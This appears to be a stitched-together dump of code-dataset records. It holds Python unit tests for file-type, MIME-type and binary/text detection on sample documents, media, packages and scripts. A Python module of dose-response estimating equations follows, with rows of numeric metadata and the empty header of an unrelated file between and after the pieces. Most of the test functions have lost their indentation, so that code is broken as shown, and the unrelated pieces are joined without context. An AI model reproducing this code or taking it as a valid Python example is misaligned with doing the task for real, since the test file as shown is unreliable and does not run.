def test_doc_office_excel_xlsx(self):
test_file = self.get_test_loc('contenttype/doc/office/excel.xlsx')
assert 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
# legacy binary Office formats only get a mimetype check
def test_doc_office_excel_xls(self):
test_file = self.get_test_loc('contenttype/doc/office/excel.xls')
assert 'application/vnd.ms-excel' == get_mimetype_file(test_file)
def test_doc_office_powerpoint_pptx(self):
test_file = self.get_test_loc('contenttype/doc/office/power.pptx')
assert 'application/vnd.openxmlformats-officedocument.presentationml.presentation' == get_mimetype_file(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
def test_doc_office_powerpoint_ppt(self):
test_file = self.get_test_loc('contenttype/doc/office/power.ppt')
assert 'application/vnd.ms-powerpoint' == get_mimetype_file(test_file)
# a Visio drawing is generic binary MS Office content
def test_doc_office_visio(self):
test_file = self.get_test_loc('contenttype/doc/office/Glitch-ERD.vsd')
assert 'application/vnd.ms-office' == get_mimetype_file(test_file)
assert not is_text(test_file)
assert is_binary(test_file)
# PDFs are binary, non-media, and these samples carry extractable text
def test_doc_pdf_1(self):
test_file = self.get_test_loc('contenttype/doc/pdf/a.pdf')
assert is_pdf(test_file)
assert is_pdf_with_text(test_file)
assert 'pdf document, version 1.2' == get_filetype(test_file)
assert not is_media(test_file)
assert is_binary(test_file)
# a file with a .pdf extension that is not a PDF yields no PDF text
def test_doc_pdf_2(self):
test_file = self.get_test_loc('contenttype/doc/pdf/notpdf.pdf')
assert not is_pdf_with_text(test_file)
def test_doc_pdf_3(self):
test_file = self.get_test_loc('contenttype/doc/pdf/pdf.pdf')
assert is_pdf(test_file)
assert is_pdf_with_text(test_file)
assert 'pdf document, version 1.4' == get_filetype(test_file)
# PostScript documents are text, not binary
def test_doc_postscript_1(self):
test_file = self.get_test_loc('contenttype/doc/postscript/doc.ps')
assert is_text(test_file)
assert not is_binary(test_file)
def test_doc_postscript_2(self):
test_file = self.get_test_loc('contenttype/doc/postscript/a.ps')
assert not is_binary(test_file)
assert not is_media(test_file)
# a DOS EPS with a binary preview header is binary, unlike plain .ps
def test_doc_postscript_eps(self):
test_file = self.get_test_loc('contenttype/doc/postscript/Image1.eps')
assert is_binary(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('DOS EPS Binary File Postscript')
# XML samples: detection depends on whether a declaration/prolog is present
def test_doc_xml(self):
test_file = self.get_test_loc('contenttype/doc/xml/simple.xml')
assert not is_binary(test_file)
assert 'ascii text' == get_filetype(test_file)
def test_doc_xml_2(self):
test_file = self.get_test_loc('contenttype/doc/xml/some.xml')
assert not is_binary(test_file)
assert 'xml document text' == get_filetype(test_file)
def test_doc_xml_3(self):
test_file = self.get_test_loc('contenttype/doc/xml/somespring.xml')
assert not is_binary(test_file)
assert 'xml document text' == get_filetype(test_file)
def test_media_audio_aif(self):
    """AIFF audio samples (.aif and .aiff) are both binary media.

    Loops over both extensions instead of re-resolving each location twice.
    """
    for name in ('contenttype/media/a.aif', 'contenttype/media/a.aiff'):
        test_file = self.get_test_loc(name)
        assert is_media(test_file)
        assert is_binary(test_file)
# audio samples: all binary media
def test_media_audio_au(self):
test_file = self.get_test_loc('contenttype/media/a.au')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_audio_flac(self):
test_file = self.get_test_loc('contenttype/media/a.flac')
assert is_media(test_file)
assert is_binary(test_file)
# MP3 streams can contain byte runs that look like text
def test_media_audio_mp3(self):
test_file = self.get_test_loc('contenttype/media/a.mp3')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_audio_wav(self):
test_file = self.get_test_loc('contenttype/media/a.wav')
assert is_media(test_file)
assert is_binary(test_file)
# image samples: all binary media unless noted
def test_media_image_bmp_1(self):
test_file = self.get_test_loc('contenttype/media/Image1.bmp')
assert is_media(test_file)
assert is_binary(test_file)
# BMP descriptions include format and pixel dimensions
def test_media_image_bmp_2(self):
test_file = self.get_test_loc('contenttype/media/TBarLrge.bmp')
assert 'pc bitmap, windows 3.x format, 400 x 32 x 4' == get_filetype(test_file)
def test_media_image_bmp_3(self):
test_file = self.get_test_loc('contenttype/media/TBarMedm.bmp')
assert 'pc bitmap, windows 3.x format, 210 x 16 x 4' == get_filetype(test_file)
def test_media_image_dib(self):
test_file = self.get_test_loc('contenttype/media/Image1.dib')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_gif(self):
test_file = self.get_test_loc('contenttype/media/Image1.gif')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_ico(self):
test_file = self.get_test_loc('contenttype/media/Image1.ico')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_iff(self):
test_file = self.get_test_loc('contenttype/media/Image1.iff')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_img(self):
# FIXME: .img files are more complex
test_file = self.get_test_loc('contenttype/media/Image1.img')
assert is_binary(test_file)
assert get_filetype_file(test_file).startswith('GEM Image data')
assert 'application/octet-stream' == get_mimetype_file(test_file)
# Python's mimetypes has no mapping for .img
assert not get_mimetype_python(test_file)
assert is_media(test_file)
def test_media_image_jif(self):
test_file = self.get_test_loc('contenttype/media/Image1.jif')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_jpeg(self):
test_file = self.get_test_loc('contenttype/media/Image1.jpeg')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_jpg(self):
test_file = self.get_test_loc('contenttype/media/Image1.jpg')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
# PBM/PPM are ASCII-encoded image formats: media but NOT binary
def test_media_image_pbm(self):
test_file = self.get_test_loc('contenttype/media/Image1.pbm')
assert is_media(test_file)
assert not is_binary(test_file)
def test_media_image_ppm(self):
test_file = self.get_test_loc('contenttype/media/Image1.ppm')
assert not is_binary(test_file)
# this is text
assert is_media(test_file)
def test_media_image_pcx(self):
test_file = self.get_test_loc('contenttype/media/Image1.pcx')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_photoshop(self):
test_file = self.get_test_loc('contenttype/media/Image1.psd')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_png(self):
test_file = self.get_test_loc('contenttype/media/a.png')
assert is_media(test_file)
assert is_binary(test_file)
assert not contains_text(test_file)
def test_media_image_psp(self):
test_file = self.get_test_loc('contenttype/media/Image1.psp')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_ras(self):
test_file = self.get_test_loc('contenttype/media/Image1.ras')
assert is_media(test_file)
assert is_binary(test_file)
# SVG is XML text: media but not binary, and never source
def test_media_image_svg(self):
test_file = self.get_test_loc('contenttype/media/drawing.svg')
assert not is_binary(test_file)
assert is_media(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'SVG Scalable Vector Graphics image' == get_filetype_file(test_file)
assert not is_source(test_file)
# NOTE: name says "tgg" but this exercises a Targa (.tga) sample
def test_media_image_tgg(self):
test_file = self.get_test_loc('contenttype/media/Image1.tga')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_tif(self):
test_file = self.get_test_loc('contenttype/media/Image1.tif')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_image_windows_metafile(self):
test_file = self.get_test_loc('contenttype/media/Image1.emf')
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert get_filetype_file(test_file).startswith('Windows Enhanced Metafile')
# Python's mimetypes has no mapping for .emf
assert not get_mimetype_python(test_file)
assert is_media(test_file)
assert is_binary(test_file)
# video samples: binary media; MPEG streams may contain text-like runs
def test_media_video_mpeg(self):
test_file = self.get_test_loc('contenttype/media/a4.mp4')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_mpg(self):
test_file = self.get_test_loc('contenttype/media/a4.mpg')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_mp2(self):
test_file = self.get_test_loc('contenttype/media/a.mp2')
assert is_media(test_file)
assert is_binary(test_file)
assert contains_text(test_file)
def test_media_video_msft_avi(self):
test_file = self.get_test_loc('contenttype/media/a.avi')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_msft_wmf(self):
test_file = self.get_test_loc('contenttype/media/Image1.wmf')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_msft_wmv(self):
    """Several WMV video samples are all binary media.

    Replaces four copy-pasted check pairs with a loop over the sample names.
    """
    sample_names = (
        'contenttype/media/mov.wvm.wmv',
        'contenttype/media/Movie.wmv',
        'contenttype/media/Movie_0001.wmv',
        'contenttype/media/Movie_0002.wmv',
    )
    for name in sample_names:
        test_file = self.get_test_loc(name)
        assert is_media(test_file)
        assert is_binary(test_file)
def test_media_video_ogg(self):
test_file = self.get_test_loc('contenttype/media/a.ogg')
assert is_media(test_file)
assert is_binary(test_file)
def test_media_video_theora_ogg(self):
test_file = self.get_test_loc('contenttype/media/a.theo.ogg')
assert is_media(test_file)
assert is_binary(test_file)
# --- Package-format tests: each package type must be detected as a binary
# --- archive that does not contain plain text.
def test_package_debian(self):
test_file = self.get_test_loc('contenttype/package/wget-el_0.5.0-8_all.deb')
assert 'debian binary package (format 2.0)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
# Jars should be reported as java archives, not as generic zip files.
def test_package_java_jar(self):
test_file = self.get_test_loc('contenttype/package/ant-jsch-1.7.0.jar')
assert 'java archive data (jar)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
# A jar renamed with a .zip extension is still detected as a jar by content.
def test_package_java_jar_as_zip(self):
test_file = self.get_test_loc('contenttype/package/ant.zip')
assert 'java archive data (jar)' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
# War files are only recognized at the zip level, not as java archives.
def test_package_java_war(self):
test_file = self.get_test_loc('contenttype/package/c.war')
assert 'zip archive data, at least v1.0 to extract' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
# Python eggs are zip archives underneath.
def test_package_python_egg(self):
test_file = self.get_test_loc('contenttype/package/TicketImport-0.7a-py2.5.egg')
assert 'zip archive data, at least v2.0 to extract' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
def test_package_rpm(self):
test_file = self.get_test_loc('contenttype/package/wget-1.11.4-3.fc11.i586.rpm')
assert 'rpm v3.0 bin i386/x86_64' == get_filetype(test_file)
assert is_binary(test_file)
assert is_archive(test_file)
assert is_compressed(test_file)
assert not contains_text(test_file)
# Rubygems are plain tarballs underneath.
def test_package_rubygem(self):
test_file = self.get_test_loc('contenttype/package/rubygems-update-1.4.1.gem')
assert 'posix tar archive' == get_filetype(test_file)
assert is_binary(test_file)
assert is_compressed(test_file)
assert is_archive(test_file)
assert not contains_text(test_file)
# --- Script tests: filetype string plus the Pygments lexer name.
def test_script_bash(self):
test_file = self.get_test_loc('contenttype/script/test.sh')
assert 'posix shell script, ascii text executable' == get_filetype(test_file)
assert 'Bash' == get_filetype_pygment(test_file)
# A shell script with no extension is still recognized as Bash source.
def test_script_bash_makelinks(self):
test_file = self.get_test_loc('contenttype/script/makelinks')
assert is_source(test_file)
assert 'Bash' == get_filetype_pygment(test_file)
def test_script_windows_bat(self):
test_file = self.get_test_loc('contenttype/script/build_w32vc.bat')
assert 'dos batch file, ascii text' == get_filetype(test_file)
assert 'Batchfile' == get_filetype_pygment(test_file)
# This .bat file is only seen as generic text by libmagic, but the
# Pygments lexer is still resolved (presumably from the extension).
def test_script_windows_bat_2(self):
test_file = self.get_test_loc('contenttype/script/zip_src.bat')
assert 'ascii text, with crlf line terminators' == get_filetype(test_file)
assert 'Batchfile' == get_filetype_pygment(test_file)
# An extensionless "install" file: plain text with no Pygments lexer.
def test_script_install(self):
test_file = self.get_test_loc('contenttype/script/install')
assert 'ascii text' == get_filetype(test_file)
assert '' == get_filetype_pygment(test_file)
# --- Plain-text tests: files that must be seen as text, not source/binary.
def test_text_crashing(self):
# these used to make libmagic crash somehow
test_file = self.get_test_loc('contenttype/text/crashing-a.txt')
assert 'ASCII text' == get_filetype_file(test_file)
test_file = self.get_test_loc('contenttype/text/crashing-z.txt')
assert 'ASCII text' == get_filetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text(self):
test_file = self.get_test_loc('contenttype/text/x11-xconsortium_text.txt')
assert not is_binary(test_file)
assert not is_archive(test_file)
assert '' == get_filetype_pygment(test_file)
# License texts are text/plain, never source code.
def test_text_license_copying(self):
test_file = self.get_test_loc('contenttype/text/COPYING')
assert 'ascii text' in get_filetype(test_file)
assert not is_source(test_file)
assert is_text(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_text_license_credits(self):
# FIXME
test_file = self.get_test_loc('contenttype/text/CREDITS')
assert 'iso-8859 text' == get_filetype(test_file)
assert is_text(test_file)
assert not is_source(test_file)
assert '' == get_filetype_pygment(test_file)
assert 'ISO-8859 text' == get_filetype_file(test_file)
assert 'text/plain' == get_mimetype_file(test_file)
def test_text_license_gpl(self):
test_file = self.get_test_loc('contenttype/text/GPL.txt')
assert not is_source(test_file)
assert '' == get_filetype_pygment(test_file)
def test_text_log(self):
    """A plain-text log file is text, not source, and has no Pygments lexer."""
    test_file = self.get_test_loc('contenttype/text/windowserver.log')
    assert not is_source(test_file)
    assert is_text(test_file)
    # Pygments has no lexer for .log files
    assert '' == get_filetype_pygment(test_file)
    assert 'ascii text' == get_filetype(test_file)
    assert 'ASCII text' == get_filetype_file(test_file)
    assert 'text/plain' == get_mimetype_file(test_file)
# Paths under /usr/lib and /usr/include, and the compiler's <built-in>
# pseudo-path, should all be treated as standard includes.
def test_is_standard_include(self):
assert is_standard_include('<built-in>')
assert is_standard_include('/usr/lib/this.h')
assert is_standard_include('/usr/include/this.h')
# An extended-ASCII ChangeLog must not be misdetected as an ISO 9660 CD image.
def test_text_iso_text_changelog_is_not_iso_cdrom(self):
test_file = self.get_test_loc('contenttype/text/ChangeLog')
assert 'Non-ISO extended-ASCII text' == get_filetype_file(test_file)
assert '' == get_filetype_pygment(test_file)
# Expected to fail until the upstream libmagic bug below is fixed.
@expectedFailure
def test_text_rsync_file_is_not_octet_stream(self):
# this is a libmagic bug: http://bugs.gw.com/view.php?id=473
test_file = self.get_test_loc('contenttype/text/wildtest.txt')
assert 'data' != get_filetype_file(test_file)
assert 'octet' not in get_mimetype_file(test_file)
def test_rgb_stream_is_binary(self):
# this is a binaryornot bug: https://github.com/audreyr/binaryornot/issues/10
test_file = self.get_test_loc('contenttype/binary/pixelstream.rgb')
assert 'data' == get_filetype_file(test_file)
assert 'application/octet-stream' == get_mimetype_file(test_file)
assert is_binary(test_file)
# A huge file full of NUL bytes is data, not text.
def test_large_text_file_is_data(self):
test_file = self.get_test_loc('contenttype/data/nulls.txt')
assert is_data(test_file)
assert '' == get_filetype_pygment(test_file)
# --- JS/CSS source-map detection: *.map files are build artifacts,
# --- except when their content is actually binary or an unrelated file.
def test_is_js_map_for_css(self):
test_file = self.get_test_loc('contenttype/build/ar-ER.css.map')
assert is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
def test_is_js_map_for_js(self):
test_file = self.get_test_loc('contenttype/build/ar-ER.js.map')
assert is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
# NOTE(review): the duplicated "test_test_" prefix below looks like a naming
# typo; renaming would change the unittest IDs, so it is left as-is.
def test_test_is_js_map_for_binary(self):
test_file = self.get_test_loc('contenttype/build/binary.js.map')
assert not is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
def test_test_is_js_map_for_makefile(self):
test_file = self.get_test_loc('contenttype/build/Makefile')
assert not is_js_map(test_file)
assert '' == get_filetype_pygment(test_file)
| 45.190515
| 243
| 0.7033
| 7,895
| 55,268
| 4.592527
| 0.076631
| 0.154449
| 0.138232
| 0.067957
| 0.848585
| 0.823046
| 0.790943
| 0.764824
| 0.741822
| 0.669066
| 0
| 0.008029
| 0.199989
| 55,268
| 1,222
| 244
| 45.227496
| 0.81201
| 0.034215
| 0
| 0.497992
| 0
| 0.003012
| 0.205894
| 0.119465
| 0
| 0
| 0
| 0.000818
| 0.584337
| 1
| 0.163655
| false
| 0
| 0.016064
| 0
| 0.181727
| 0.001004
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b21118449816cb9e49ae528b8e2ba4c4fcf49b6b
| 22,695
|
py
|
Python
|
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
delicatessen/estimating_equations/dose_response.py
|
pzivich/Deli
|
761aa51c6949334b59fffb185be4266177454b6c
|
[
"MIT"
] | null | null | null |
import numpy as np
#################################################################
# Dose-Response Estimating Equations
def ee_4p_logistic(theta, X, y):
    r"""Stacked estimating equations for the four-parameter logistic (4PL)
    dose-response model, often used for dose-response and bioassay analyses.
    The mean function is

    .. math::

        f(x; \theta) = \theta_0 + \frac{\theta_3 - \theta_0}
        {1 + (x / \theta_1)^{\theta_2}}

    and the estimating equations are the per-observation gradients of the
    squared-error loss, :math:`\sum_i^n -2 (Y_i - f(X_i; \theta))
    \nabla_\theta f(X_i; \theta) = 0`.

    Here, ``theta`` is a 1-by-4 array: ``theta[0]`` is the lower limit,
    ``theta[1]`` the effective dose (ED50), ``theta[2]`` the steepness of
    the curve, and ``theta[3]`` the upper limit.

    Note
    ----
    All provided estimating equations are meant to be wrapped inside a
    user-specified function, conventionally named ``psi``. The 4PL is harder
    to optimize than most estimating equations: the root-finder is unaware
    of the implicit parameter bounds, so give it good starting values
    (e.g. ``min(y)`` for the lower limit, the response mid-point for the
    ED50, a small positive value for the steepness, ``max(y)`` for the
    upper limit) and consider the ``lm`` solver.

    Parameters
    ----------
    theta : ndarray, list, vector
        4 parameter values. In general, starting values ``>0`` are better
        choices for the 4PL model.
    X : ndarray, list, vector
        1-dimensional vector of n dose values. No missing data should be
        included (missing data may cause unexpected behavior).
    y : ndarray, list, vector
        1-dimensional vector of n response values. No missing data should be
        included (missing data may cause unexpected behavior).

    Returns
    -------
    array :
        Returns a 4-by-n NumPy array evaluated for the input theta, y, X

    Examples
    --------
    >>> def psi(theta):
    >>>     return ee_4p_logistic(theta=theta, X=dose_data, y=resp_data)

    References
    ----------
    Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis
    using R. *PloS One*, 10(12), e0146021.

    An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A
    Stable Convergence Algorithm for the 4 Parameter Logistic Model.
    *R J.*, 11(2), 171.
    """
    # rho = (x / ED50)^steepness appears in f(x) and in every gradient term
    rho = (X / theta[1]) ** theta[2]
    # 4PL mean function (y-hat): lower + (upper - lower) / (1 + rho)
    fx = theta[0] + (theta[3] - theta[0]) / (1 + rho)
    # log(x / ED50) taken only where dose > 0 to avoid log(0); `out` pre-fills
    # the skipped entries with zero -- without `out`, np.log with `where=`
    # leaves those entries uninitialized (arbitrary memory)
    nested_log = np.log(X / theta[1],
                        out=np.zeros(np.shape(X), dtype=float),
                        where=0 < X)
    # Partial derivatives of fx, stacked in the same order as theta. A row's
    # overall sign does not change the roots of the estimating equations.
    deriv = np.array((1 - 1/(1+rho),                                         # d f / d lower limit
                      (theta[3]-theta[0])*theta[2]/theta[1]*rho/(1+rho)**2,  # d f / d ED50
                      (theta[3] - theta[0]) * nested_log * rho / (1 + rho)**2,  # d f / d steepness
                      1 / (1 + rho)), )                                      # d f / d upper limit
    # Gradient contribution of each observation i (4-by-n)
    return -2*(y-fx)*deriv
def ee_3p_logistic(theta, X, y, lower):
    r"""Stacked estimating equations for the three-parameter logistic (3PL)
    dose-response model. The mean function is

    .. math::

        f(x; \theta) = L + \frac{\theta_2 - L}{1 + (x / \theta_0)^{\theta_1}}

    where :math:`L` is the user-specified lower limit, and the estimating
    equations are the per-observation gradients of the squared-error loss,
    :math:`\sum_i^n -2 (Y_i - f(X_i; \theta)) \nabla_\theta f(X_i; \theta)
    = 0`.

    Here, ``theta`` is a 1-by-3 array: ``theta[0]`` is the effective dose
    (ED50), ``theta[1]`` the steepness of the curve, and ``theta[2]`` the
    upper limit. The lower limit is pre-specified by the user (and is no
    longer estimated).

    Note
    ----
    All provided estimating equations are meant to be wrapped inside a
    user-specified function, conventionally named ``psi``. As with the 4PL,
    give the root-finder good starting values (the response mid-point for
    the ED50, a small positive value for the steepness, ``max(y)`` for the
    upper limit) and consider the ``lm`` solver.

    Parameters
    ----------
    theta : ndarray, list, vector
        3 parameter values. In general, starting values ``>0`` are better
        choices for the 3PL model.
    X : ndarray, list, vector
        1-dimensional vector of n dose values. No missing data should be
        included (missing data may cause unexpected behavior).
    y : ndarray, list, vector
        1-dimensional vector of n response values. No missing data should be
        included (missing data may cause unexpected behavior).
    lower : int, float
        Set value for the lower limit.

    Returns
    -------
    array :
        Returns a 3-by-n NumPy array evaluated for the input theta, y, X

    Examples
    --------
    >>> def psi(theta):
    >>>     return ee_3p_logistic(theta=theta, X=dose_data, y=resp_data,
    >>>                           lower=0)

    References
    ----------
    Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis
    using R. *PloS One*, 10(12), e0146021.

    An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A
    Stable Convergence Algorithm for the 4 Parameter Logistic Model.
    *R J.*, 11(2), 171.
    """
    # rho = (x / ED50)^steepness appears in f(x) and in every gradient term
    rho = (X / theta[0])**theta[1]
    # 3PL mean function (y-hat): lower + (upper - lower) / (1 + rho)
    fx = lower + (theta[2] - lower) / (1 + rho)
    # log(x / ED50) taken only where dose > 0 to avoid log(0); `out` pre-fills
    # the skipped entries with zero -- without `out`, np.log with `where=`
    # leaves those entries uninitialized (arbitrary memory)
    nested_log = np.log(X / theta[0],
                        out=np.zeros(np.shape(X), dtype=float),
                        where=0 < X)
    # Partial derivatives of fx, stacked in the same order as theta
    deriv = np.array(((theta[2]-lower)*theta[1]/theta[0]*rho/(1+rho)**2,  # d f / d ED50
                      (theta[2]-lower) * nested_log * rho / (1+rho)**2,   # d f / d steepness
                      1 / (1 + rho)), )                                   # d f / d upper limit
    # Gradient contribution of each observation i (3-by-n)
    return -2*(y - fx)*deriv
def ee_2p_logistic(theta, X, y, lower, upper):
    r"""Stacked estimating equations for the two-parameter logistic (2PL)
    dose-response model. The mean function is

    .. math::

        f(x; \theta) = L + \frac{U - L}{1 + (x / \theta_0)^{\theta_1}}

    where :math:`L` and :math:`U` are the user-specified lower and upper
    limits, and the estimating equations are the per-observation gradients
    of the squared-error loss, :math:`\sum_i^n -2 (Y_i - f(X_i; \theta))
    \nabla_\theta f(X_i; \theta) = 0`.

    Here, ``theta`` is a 1-by-2 array: ``theta[0]`` is the effective dose
    (ED50) and ``theta[1]`` the steepness of the curve. Both the lower and
    upper limits are pre-specified by the user (and no longer estimated).

    Note
    ----
    All provided estimating equations are meant to be wrapped inside a
    user-specified function, conventionally named ``psi``. As with the 4PL,
    give the root-finder good starting values (the response mid-point for
    the ED50, a small positive value for the steepness) and consider the
    ``lm`` solver.

    Parameters
    ----------
    theta : ndarray, list, vector
        2 parameter values. In general, starting values ``>0`` are better
        choices for the 2PL model.
    X : ndarray, list, vector
        1-dimensional vector of n dose values. No missing data should be
        included (missing data may cause unexpected behavior).
    y : ndarray, list, vector
        1-dimensional vector of n response values. No missing data should be
        included (missing data may cause unexpected behavior).
    lower : int, float
        Set value for the lower limit.
    upper : int, float
        Set value for the upper limit.

    Returns
    -------
    array :
        Returns a 2-by-n NumPy array evaluated for the input theta, y, X

    Examples
    --------
    >>> def psi(theta):
    >>>     return ee_2p_logistic(theta=theta, X=dose_data, y=resp_data,
    >>>                           lower=0, upper=8)

    References
    ----------
    Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis
    using R. *PloS One*, 10(12), e0146021.

    An H, Justin TL, Aubrey GB, Marron JS, & Dittmer DP. (2019). dr4pl: A
    Stable Convergence Algorithm for the 4 Parameter Logistic Model.
    *R J.*, 11(2), 171.
    """
    # rho = (x / ED50)^steepness appears in f(x) and in every gradient term
    rho = (X / theta[0])**theta[1]
    # 2PL mean function (y-hat): lower + (upper - lower) / (1 + rho)
    fx = lower + (upper - lower) / (1 + rho)
    # log(x / ED50) taken only where dose > 0 to avoid log(0); `out` pre-fills
    # the skipped entries with zero -- without `out`, np.log with `where=`
    # leaves those entries uninitialized (arbitrary memory)
    nested_log = np.log(X / theta[0],
                        out=np.zeros(np.shape(X), dtype=float),
                        where=0 < X)
    # Partial derivatives of fx, stacked in the same order as theta
    deriv = np.array(((upper-lower)*theta[1]/theta[0]*rho/(1+rho)**2,  # d f / d ED50
                      (upper-lower) * nested_log * rho / (1+rho)**2), )  # d f / d steepness
    # Gradient contribution of each observation i (2-by-n)
    return -2*(y-fx)*deriv
def ee_effective_dose_delta(theta, y, delta, steepness, ed50, lower, upper):
    r"""Estimating equation for the :math:`ED(\delta)` effective dose of a
    parameter-logistic (PL) dose-response model. Meant to be stacked with the
    estimating equations of the 4PL, 3PL, or 2PL models. The estimating
    equation is

    .. math::

        \psi(Y_i, \theta) = \beta_1 + \frac{\beta_4 - \beta_1}
        {1 + (\theta / \beta_2)^{\beta_3}} - \beta_4(1-\delta)
        - \beta_1 \delta

    where :math:`\theta` is the :math:`ED(\delta)` and the beta values come
    from the paired PL model (1: lower limit, 2: steepness, 3: ED(50),
    4: upper limit). When lower or upper limits are fixed by the user, the
    corresponding betas are replaced by constants. For proper uncertainty
    estimation, this estimating equation should be stacked together with the
    corresponding PL model.

    Parameters
    ----------
    theta : int, float
        Candidate dose value corresponding to the ED(delta).
    y : ndarray, list, vector
        1-dimensional vector of n response values; used only to give the
        returned array the correct 1-by-n shape.
    delta : float
        The effective dose level of interest (e.g. ``0.25`` for the ED25).
    steepness : float
        NOTE(review): despite its name, this argument is used as the divisor
        in ``(theta / steepness)**ed50``; the documented usage passes the PL
        model's ED50 estimate here. Behavior is correct when called as in
        the examples, but confirm against upstream before renaming.
    ed50 : float
        NOTE(review): used as the exponent; the documented usage passes the
        PL model's steepness estimate here (see note on ``steepness``).
    lower : int, float
        Estimated parameter or pre-specified constant for the lower limit.
        This should be a pre-specified constant for both the 3PL and 2PL.
    upper : int, float
        Estimated parameter or pre-specified constant for the upper limit.
        This should be a pre-specified constant for the 2PL.

    Returns
    -------
    array :
        Returns a 1-by-n NumPy array evaluated for the input theta

    Examples
    --------
    >>> def psi(theta):
    >>>     pl_model = ee_3p_logistic(theta=theta, X=dose_data, y=resp_data,
    >>>                               lower=0)
    >>>     ed_25 = ee_effective_dose_delta(theta[3], y=resp_data, delta=0.25,
    >>>                                     steepness=theta[0], ed50=theta[1],
    >>>                                     lower=0, upper=theta[2])
    >>>     return np.vstack((pl_model, ed_25, ))

    References
    ----------
    Ritz C, Baty F, Streibig JC, & Gerhard D. (2015). Dose-response analysis
    using R. *PloS One*, 10(12), e0146021.

    Inderjit, Streibig JC, & Olofsdotter M. (2002). Joint action of phenolic
    acid mixtures and its significance in allelopathy research.
    *Physiologia Plantarum*, 114(3), 422-428.
    """
    # rho of the PL model evaluated at the candidate dose theta
    rho = (theta / steepness)**ed50
    # Predicted response f(theta) of the PL model at the candidate dose
    fx = lower + (upper - lower) / (1 + rho)
    # The ED(delta) solves f(theta) = upper*(1-delta) + lower*delta, so
    # subtracting that target makes theta a root of the estimating equation
    ed_delta = fx - upper*(1-delta) - lower*delta
    # Broadcast to 1-by-n so it stacks alongside the PL model's n columns
    return np.ones(np.asarray(y).shape[0])*ed_delta
| 45.299401
| 120
| 0.648821
| 3,277
| 22,695
| 4.43729
| 0.112298
| 0.014855
| 0.006877
| 0.010728
| 0.869541
| 0.835431
| 0.827591
| 0.82147
| 0.81645
| 0.778145
| 0
| 0.026294
| 0.250936
| 22,695
| 500
| 121
| 45.39
| 0.829059
| 0.854594
| 0
| 0.378378
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108108
| false
| 0
| 0.027027
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b212be1cf6b360e5bebd26d0b3a9a5239879159d
| 16,064
|
py
|
Python
|
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
Thesis/RNNs/to_create_2011.py
|
jmppmj/thesis_recurrent_neural_nets
|
